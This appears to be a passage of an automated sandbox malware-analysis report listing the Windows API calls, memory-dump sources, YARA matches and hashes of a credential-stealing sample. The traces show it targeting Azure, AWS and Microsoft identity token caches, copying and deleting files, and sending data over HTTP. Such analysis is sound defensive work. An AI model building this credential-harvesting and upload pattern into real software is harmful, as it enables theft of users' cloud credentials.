                                              • Part of subcall function 023FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 023FAC79
                                              • Part of subcall function 023FAA07: lstrcpy.KERNEL32(?,00000000), ref: 023FAA4D
                                              • Part of subcall function 023E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 023E9C53
                                              • Part of subcall function 023E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 023E9C78
                                              • Part of subcall function 023E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 023E9C98
                                              • Part of subcall function 023E9C27: ReadFile.KERNEL32(000000FF,?,00000000,023E16F6,00000000), ref: 023E9CC1
                                              • Part of subcall function 023E9C27: LocalFree.KERNEL32(023E16F6), ref: 023E9CF7
                                              • Part of subcall function 023E9C27: CloseHandle.KERNEL32(000000FF), ref: 023E9D01
                                              • Part of subcall function 023F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 023F90B9
                                            • strtok_s.MSVCRT ref: 023F0582
                                            • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 023F05C9
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 023F05D0
                                            • StrStrA.SHLWAPI(00000000,00421618), ref: 023F05EC
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 023F05FA
                                              • Part of subcall function 023F8B47: malloc.MSVCRT ref: 023F8B4F
                                              • Part of subcall function 023F8B47: strncpy.MSVCRT ref: 023F8B6A
                                            • StrStrA.SHLWAPI(00000000,00421620), ref: 023F0636
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 023F0644
                                            • StrStrA.SHLWAPI(00000000,00421628), ref: 023F0680
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 023F068E
                                            • StrStrA.SHLWAPI(00000000,00421630), ref: 023F06CA
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 023F06DC
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 023F0769
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 023F0781
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 023F0799
                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 023F07B1
                                            • lstrcat.KERNEL32(?,0042164C), ref: 023F07C9
                                            • lstrcat.KERNEL32(?,00421660), ref: 023F07D8
                                            • lstrcat.KERNEL32(?,00421670), ref: 023F07E7
                                            • lstrcat.KERNEL32(?,00000000), ref: 023F07FA
                                            • lstrcat.KERNEL32(?,00421678), ref: 023F0809
                                            • lstrcat.KERNEL32(?,00000000), ref: 023F081C
                                            • lstrcat.KERNEL32(?,0042167C), ref: 023F082B
                                            • lstrcat.KERNEL32(?,00421680), ref: 023F083A
                                            • lstrcat.KERNEL32(?,00000000), ref: 023F084D
                                            • lstrcat.KERNEL32(?,00421688), ref: 023F085C
                                            • lstrcat.KERNEL32(?,0042168C), ref: 023F086B
                                            • lstrcat.KERNEL32(?,00000000), ref: 023F087E
                                            • lstrcat.KERNEL32(?,00421698), ref: 023F088D
                                            • lstrcat.KERNEL32(?,0042169C), ref: 023F089C
                                            • strtok_s.MSVCRT ref: 023F08E0
                                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 023F08F5
                                            • memset.MSVCRT ref: 023F0944
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                            • String ID:
                                            • API String ID: 3689735781-0
                                            • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                            • Instruction ID: 79b53a10cfd65f85f20197f6ea3f15fd13424da49c27b542d3cd32e288252fdb
                                            • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                            • Instruction Fuzzy Hash: B7D15E76A40208ABCB54FBF4ED95EEEB77AFF14300F504519E206A6190DF74AA09CF61
                                            APIs
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                              • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                              • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                            • StrCmpCA.SHLWAPI(?,007CC908), ref: 00405A13
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,007CC928,00000000,?,00799BE8,00000000,?,00421A1C), ref: 00405E71
                                            • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                            • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                            • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                            • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                            • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                            • memcpy.MSVCRT(?), ref: 00405EFE
                                            • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                            • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                            • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                            • HttpOpenRequestA.WININET(00000000,007CC9D8,?,007CC638,00000000,00000000,00400100,00000000), ref: 00405BF8
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                            • String ID: "$"$------$------$------
                                            • API String ID: 1406981993-2180234286
                                            • Opcode ID: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                            • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                            • Opcode Fuzzy Hash: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                            • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                            APIs
                                            • memset.MSVCRT ref: 00414D87
                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                            • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                              • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                            • memset.MSVCRT ref: 00414E13
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                            • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                              • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                              • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                            • memset.MSVCRT ref: 00414E9F
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                            • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                              • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,0079D5B0,?,000003E8), ref: 00414A4A
                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                              • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                              • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                            • memset.MSVCRT ref: 00414F2B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                            • API String ID: 4017274736-156832076
                                            • Opcode ID: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                            • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                            • Opcode Fuzzy Hash: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                            • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                            APIs
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                              • Part of subcall function 023FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 023FAC2C
                                              • Part of subcall function 023FAC17: lstrcpy.KERNEL32(00000000), ref: 023FAC6B
                                              • Part of subcall function 023FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 023FAC79
                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                              • Part of subcall function 023F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,023E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 023F8DED
                                              • Part of subcall function 023FAB87: lstrcpy.KERNEL32(00000000,?), ref: 023FABD9
                                              • Part of subcall function 023FAB87: lstrcat.KERNEL32(00000000), ref: 023FABE9
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 023ED1EA
                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 023ED32E
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 023ED335
                                            • lstrcat.KERNEL32(?,00000000), ref: 023ED46F
                                            • lstrcat.KERNEL32(?,00421478), ref: 023ED47E
                                            • lstrcat.KERNEL32(?,00000000), ref: 023ED491
                                            • lstrcat.KERNEL32(?,0042147C), ref: 023ED4A0
                                            • lstrcat.KERNEL32(?,00000000), ref: 023ED4B3
                                            • lstrcat.KERNEL32(?,00421480), ref: 023ED4C2
                                            • lstrcat.KERNEL32(?,00000000), ref: 023ED4D5
                                            • lstrcat.KERNEL32(?,00421484), ref: 023ED4E4
                                            • lstrcat.KERNEL32(?,00000000), ref: 023ED4F7
                                            • lstrcat.KERNEL32(?,00421488), ref: 023ED506
                                            • lstrcat.KERNEL32(?,00000000), ref: 023ED519
                                            • lstrcat.KERNEL32(?,0042148C), ref: 023ED528
                                            • lstrcat.KERNEL32(?,00000000), ref: 023ED53B
                                            • lstrcat.KERNEL32(?,00421490), ref: 023ED54A
                                              • Part of subcall function 023FAA87: lstrlen.KERNEL32(023E516C,?,?,023E516C,00420DDE), ref: 023FAA92
                                              • Part of subcall function 023FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 023FAAEC
                                            • lstrlen.KERNEL32(?), ref: 023ED591
                                            • lstrlen.KERNEL32(?), ref: 023ED5A0
                                            • memset.MSVCRT ref: 023ED5EF
                                              • Part of subcall function 023FACD7: StrCmpCA.SHLWAPI(0064A350,023EAA0E,?,023EAA0E,0064A350), ref: 023FACF6
                                            • DeleteFileA.KERNEL32(00000000), ref: 023ED61B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                            • String ID:
                                            • API String ID: 1973479514-0
                                            • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                            • Instruction ID: 2901359997bedbeb18b8c0669440a9b8728aaaad352391238cba8e402bec0058
                                            • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                            • Instruction Fuzzy Hash: 0AE14E75950218ABCB58FBE0ED95EEE737AAF14301F504159F20AA61A0DF34AE09CF61
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00799AC8,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                            • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                            • lstrcatA.KERNEL32(?,00000000,0079D3D0,00421474,0079D3D0,00421470,00000000), ref: 0040D208
                                            • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                            • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                            • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                            • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                            • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                            • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                            • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0079D410,?,0042110C,?,00000000), ref: 0041A82B
                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                            • lstrlenA.KERNEL32(?), ref: 0040D32A
                                            • lstrlenA.KERNEL32(?), ref: 0040D339
                                            • memset.MSVCRT ref: 0040D388
                                              • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                            • String ID:
                                            • API String ID: 2775534915-0
                                            • Opcode ID: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                            • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                            • Opcode Fuzzy Hash: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                            • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                            APIs
                                              • Part of subcall function 023FAA07: lstrcpy.KERNEL32(?,00000000), ref: 023FAA4D
                                              • Part of subcall function 023E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023E4A51
                                              • Part of subcall function 023E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023E4A68
                                              • Part of subcall function 023E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 023E4A7F
                                              • Part of subcall function 023E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 023E4AA0
                                              • Part of subcall function 023E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 023E4AB0
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 023E5C5F
                                            • StrCmpCA.SHLWAPI(?,0064A480), ref: 023E5C7A
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 023E5DFA
                                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 023E60D8
                                            • lstrlen.KERNEL32(00000000), ref: 023E60E9
                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 023E60FA
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 023E6101
                                            • lstrlen.KERNEL32(00000000), ref: 023E6116
                                            • memcpy.MSVCRT(?,00000000,00000000), ref: 023E612D
                                            • lstrlen.KERNEL32(00000000), ref: 023E613F
                                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 023E6158
                                            • memcpy.MSVCRT(?), ref: 023E6165
                                            • lstrlen.KERNEL32(00000000,?,?), ref: 023E6182
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 023E6196
                                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 023E61B3
                                            • InternetCloseHandle.WININET(00000000), ref: 023E6217
                                            • InternetCloseHandle.WININET(00000000), ref: 023E6224
                                            • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 023E5E5F
                                              • Part of subcall function 023FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 023FAC2C
                                              • Part of subcall function 023FAC17: lstrcpy.KERNEL32(00000000), ref: 023FAC6B
                                              • Part of subcall function 023FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 023FAC79
                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                              • Part of subcall function 023FAB87: lstrcpy.KERNEL32(00000000,?), ref: 023FABD9
                                              • Part of subcall function 023FAB87: lstrcat.KERNEL32(00000000), ref: 023FABE9
                                            • InternetCloseHandle.WININET(00000000), ref: 023E622E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                            • String ID:
                                            • API String ID: 1703137719-0
                                            • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                            • Instruction ID: eadda42286e45bbe0e77848794659050c714ff957c61b1b0582095d094fec064
                                            • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                            • Instruction Fuzzy Hash: 9F12D675950228ABCF65EBA0ED94FEEB37ABF14700F504199E20AA2191DF706F49CF50
                                            APIs
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                              • Part of subcall function 023FAB87: lstrcpy.KERNEL32(00000000,?), ref: 023FABD9
                                              • Part of subcall function 023FAB87: lstrcat.KERNEL32(00000000), ref: 023FABE9
                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                              • Part of subcall function 023FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 023FAC2C
                                              • Part of subcall function 023FAC17: lstrcpy.KERNEL32(00000000), ref: 023FAC6B
                                              • Part of subcall function 023FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 023FAC79
                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 023ECCD3
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 023ECCF0
                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 023ECCFC
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 023ECD0F
                                            • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 023ECD1C
                                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 023ECD40
                                            • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 023ECD5E
                                            • StrStrA.SHLWAPI(00000000,0064A364), ref: 023ECD85
                                            • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 023ECF09
                                            • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 023ECF20
                                              • Part of subcall function 023ECA87: memset.MSVCRT ref: 023ECABA
                                              • Part of subcall function 023ECA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 023ECAD8
                                              • Part of subcall function 023ECA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 023ECAE3
                                              • Part of subcall function 023ECA87: memcpy.MSVCRT(?,?,?), ref: 023ECB79
                                            • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 023ECFC1
                                            • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 023ECFD8
                                              • Part of subcall function 023ECA87: lstrcat.KERNEL32(?,00420B46), ref: 023ECBAA
                                              • Part of subcall function 023ECA87: lstrcat.KERNEL32(?,00420B47), ref: 023ECBBE
                                              • Part of subcall function 023ECA87: lstrcat.KERNEL32(?,00420B4E), ref: 023ECBDF
                                            • lstrlen.KERNEL32(00000000), ref: 023ED0AB
                                            • CloseHandle.KERNEL32(00000000), ref: 023ED103
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                            • String ID:
                                            • API String ID: 3555725114-3916222277
                                            • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                            • Instruction ID: 375efb3b84f44c4723c951c9a1fc37bb96e3b172e3f3cf41f8e785ecc032cd10
                                            • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                            • Instruction Fuzzy Hash: 2AE1E076900208ABCF65EBA4ED95FEEB77AAF14300F004159F20AA7191DF346A89CF51
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,007CAC38,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                            • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
